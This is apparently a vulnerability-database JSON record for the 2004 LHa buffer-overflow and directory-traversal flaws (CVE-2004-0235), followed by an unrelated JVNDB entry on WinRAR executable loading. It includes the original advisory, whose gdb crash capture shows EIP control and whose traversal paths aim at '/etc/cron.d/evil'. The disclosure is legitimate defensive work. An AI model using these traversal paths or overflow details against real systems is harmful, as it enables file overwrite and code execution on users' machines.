"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:redhat:fedora_core:core_1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ulf Harnhammar\u203b ulfh@update.uu.se\u203bJean-S\u00e9bastien Guay-Leroux\u203b jean-sebastien@guay-leroux.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0235",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.4,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2004-0235",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-8665",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0235",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200408-176",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-8665",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes (\"//absolute/path\"). \nThe first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. \nThe second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. \n**NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. \n**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. ------------------------------------------------------------------------\n\nLHa buffer overflows and directory traversal problems\n\nPROGRAM: LHa (Unix version)\nVENDOR: various people\nVULNERABLE VERSIONS: 1.14d to 1.14i\n 1.17 (Linux binary)\n possibly others\nIMMUNE VERSIONS: 1.14i with my patch applied\n 1.14h with my patch applied\nLHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm\n http://www2m.biglobe.ne.jp/~dolphin/lha/prog/\nLHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/\nREFERENCES: CAN-2004-0234 (buffer overflows)\n CAN-2004-0235 (directory traversal)\n\n* DESCRIPTION *\n\nLHa is a console-based program for packing and unpacking LHarc\narchives. \n\nIt is one of the packages in Red Hat Linux, Fedora Core, SUSE\nLinux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux,\nGentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. \nIt is also included in the port/package collections for FreeBSD,\nOpenBSD and NetBSD. \n\n* OVERVIEW *\n\nLHa has two stack-based buffer overflows and two directory traversal\nproblems. They can be abused by malicious people in many different\nways: some mail virus scanners require LHa and run it automatically\non attached files in e-mail messages. Some web applications allow\nuploading and unpacking of LHarc archives. Some people set up their\nweb browsers to start LHa automatically after downloading an LHarc\narchive. Finally, social engineering is probably quite effective\nin this case. \n\n* TECHNICAL DETAILS *\n\na) two stack-based buffer overflows\n\nThe buffer overflows in LHa occur when testing (t) or extracting\n(x) archives where the archive contents have too long filenames\nor directory names. The cause of the problem is the function\nget_header() in header.c. This function first reads the lengths of\nfilenames or directory names from the archive, and then it reads\nthat many bytes to a char array (one for filenames and one for\ndirectory names) without checking if the array is big enough. \n\nBy exploiting this bug, you get control over several registers\nincluding EIP, as you can see in this session capture:\n\n$ lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ gdb lha\nGNU gdb Red Hat Linux (5.3post-0.20021129.18rh)\nCopyright 2003 Free Software Foundation, Inc. \nGDB is free software, covered by the GNU General Public License, and\nyou are welcome to change it and/or distribute copies of it under\ncertain conditions. \nType \"show copying\" to see the conditions. \nThere is absolutely no warranty for GDB. Type \"show warranty\" for\ndetails. \nThis GDB was configured as \"i386-redhat-linux-gnu\"... \n(gdb) r x buf_oflow.lha\nStarting program: /usr/bin/lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffdd50 0xbfffdd50\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210282 2163330\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) r t buf_oflow.lha\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y\nStarting program: /usr/bin/lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffe6d0 0xbfffe6d0\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210286 2163334\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) q\nThe program is running. Exit anyway? (y or n) y\n$\n\nb) two directory traversal problems\n\nLHa has directory traversal problems, both with absolute paths\nand relative paths. There is no protection against relative paths\nat all, so you can simply use the lha binary to create an archive\nwith paths like \"../../../../../etc/cron.d/evil\". There is some\nsimple protection against absolute paths, namely skipping the first\ncharacter if it is a slash, but again you can simply use the binary\nto create archives with paths like \"//etc/cron.d/evil\". \n\n* ATTACHED FILES *\n\nI have written a patch against version 1.14i that corrects all\nfour problems. The patch is included as an attachment, together\nwith some test archives. \n\n* TIMELINE *\n\n18 Apr: contacted the vendor-sec list and the LHa 1.14 author\n18 Apr: tried to contact the LHa 1.17 author with a web form and\n a guessed e-mail address which bounced\n19 Apr: reply from the vendor-sec list with CVE references\n30 Apr: Red Hat released their advisory\n01 May: I release this advisory\n\n// Ulf Harnhammar\nAdvogato diary :: http://www.advogato.org/person/metaur/\nidiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/\nDebian Security Audit Project :: http://shellcode.org/Audit/\n\n------------------------------------------------------------------------\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "PACKETSTORM",
"id": "33241"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-0235",
"trust": 2.9
},
{
"db": "BID",
"id": "10243",
"trust": 2.8
},
{
"db": "XF",
"id": "16013",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176",
"trust": 0.7
},
{
"db": "FULLDISC",
"id": "20040501 LHA BUFFER OVERFLOWS AND DIRECTORY TRAVERSAL PROBLEMS",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:978",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:10409",
"trust": 0.6
},
{
"db": "FEDORA",
"id": "FEDORA-2004-119",
"trust": 0.6
},
{
"db": "FEDORA",
"id": "FLSA:1833",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-515",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040510 [ULF HARNHAMMAR]: LHA ADVISORY + PATCH",
"trust": 0.6
},
{
"db": "GENTOO",
"id": "GLSA-200405-02",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2004:178",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2004:179",
"trust": 0.6
},
{
"db": "CONECTIVA",
"id": "CLA-2004:840",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-8665",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "33241",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
]
},
"id": "VAR-200408-0141",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-8665"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T11:41:21.801000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LHA for UNIX Version 1.17",
"trust": 0.8,
"url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://lha.sourceforge.jp/"
},
{
"title": "RHSA-2004:178",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/rhsa-2004-178.html"
},
{
"title": "RHSA-2004:179",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/rhsa-2004-179.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/10243"
},
{
"trust": 2.0,
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-may/msg00005.html"
},
{
"trust": 1.8,
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"trust": 1.7,
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"trust": 1.7,
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020776.html"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2004-178.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2004-179.html"
},
{
"trust": 1.6,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/16013"
},
{
"trust": 1.4,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:978"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10409"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a978"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0235"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0235"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"trust": 0.6,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:10409"
},
{
"trust": 0.4,
"url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
},
{
"trust": 0.3,
"url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
},
{
"trust": 0.3,
"url": "http://www.stalker.com/cgpmcafee/"
},
{
"trust": 0.3,
"url": "http://www.f-secure.com/security/fsc-2004-1.shtml"
},
{
"trust": 0.3,
"url": "http://mail.stalker.com/lists/cgatepro/message/61244.html"
},
{
"trust": 0.3,
"url": "http://images.mcafee.com/misc/mcafee_security_bulletin_05-march-17.pdf"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2004-178.html"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2004-219.html"
},
{
"trust": 0.3,
"url": "http://www.rarsoft.com/"
},
{
"trust": 0.3,
"url": "http://www.winzip.com/"
},
{
"trust": 0.3,
"url": "/archive/1/366265"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108422737918885\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000840"
},
{
"trust": 0.1,
"url": "http://shellcode.org/audit/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0234"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0235"
},
{
"trust": 0.1,
"url": "http://idiosynkratisk.tk/"
},
{
"trust": 0.1,
"url": "http://www.advogato.org/person/metaur/"
},
{
"trust": 0.1,
"url": "http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm"
},
{
"trust": 0.1,
"url": "http://www2m.biglobe.ne.jp/~dolphin/lha/prog/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-08-18T00:00:00",
"db": "VULHUB",
"id": "VHN-8665"
},
{
"date": "2004-04-30T00:00:00",
"db": "BID",
"id": "10243"
},
{
"date": "2008-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"date": "2004-05-04T04:25:06",
"db": "PACKETSTORM",
"id": "33241"
},
{
"date": "2004-08-18T04:00:00",
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"date": "2004-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-8665"
},
{
"date": "2009-07-12T04:07:00",
"db": "BID",
"id": "10243"
},
{
"date": "2008-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"date": "2017-10-11T01:29:24.810000",
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"date": "2006-09-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Lha Directory Traversal Vulnerability in Testing and Extracting Process",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "10243"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
],
"trust": 0.9
}
}
jvndb-2015-000199
Vulnerability from jvndb
Published
2015-12-17 15:19
Modified
2016-01-07 15:36
Severity ?
Summary
WinRAR may insecurely load executable files
Details
WinRAR contains a function where user specified files on the local disk can be executed. When this file does not have a file extension, a file of the same name with a file extension contained in the same folder may be executed by WinRAR instead of the user specified file.
WinRAR also contains a function where registry settings can be saved and registry settings can be recovered from files. If the folder displayed on screen contains an executable file, such as REGEDIT.BAT, when attempting to save or recover registry settings, REGEDIT.BAT is executed instead of the Windows registry editor (regedit.exe).
References
{
"@rdf:about": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000199.html",
"dc:date": "2016-01-07T15:36+09:00",
"dcterms:issued": "2015-12-17T15:19+09:00",
"dcterms:modified": "2016-01-07T15:36+09:00",
"description": "WinRAR contains a function where user specified files on the local disk can be executed. When this file does not have a file extension, a file of the same name with a file extension contained in the same folder may be executed by WinRAR instead of the user specified file.\r\n\r\nWinRAR also contains a function where registry settings can be saved and registry settings can be recovered from files. If the folder displayed on screen contains an executable file, such as REGEDIT.BAT, when attempting to save or recover registry settings, REGEDIT.BAT is executed instead of the Windows registry editor (regedit.exe).",
"link": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000199.html",
"sec:cpe": {
"#text": "cpe:/a:rarlab:winrar",
"@product": "WinRAR",
"@vendor": "RARLAB",
"@version": "2.2"
},
"sec:cvss": [
{
"@score": "5.1",
"@severity": "Medium",
"@type": "Base",
"@vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"@version": "2.0"
},
{
"@score": "7.8",
"@severity": "High",
"@type": "Base",
"@vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"@version": "3.0"
}
],
"sec:identifier": "JVNDB-2015-000199",
"sec:references": [
{
"#text": "https://jvn.jp/en/jp/JVN64636058/index.html",
"@id": "JVN#64636058",
"@source": "JVN"
},
{
"#text": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5663",
"@id": "CVE-2015-5663",
"@source": "CVE"
},
{
"#text": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5663",
"@id": "CVE-2015-5663",
"@source": "NVD"
},
{
"#text": "https://www.ipa.go.jp/en/security/vulnerabilities/cwe.html",
"@id": "CWE-Other",
"@title": "No Mapping(CWE-Other)"
}
],
"title": "WinRAR may insecurely load executable files"
}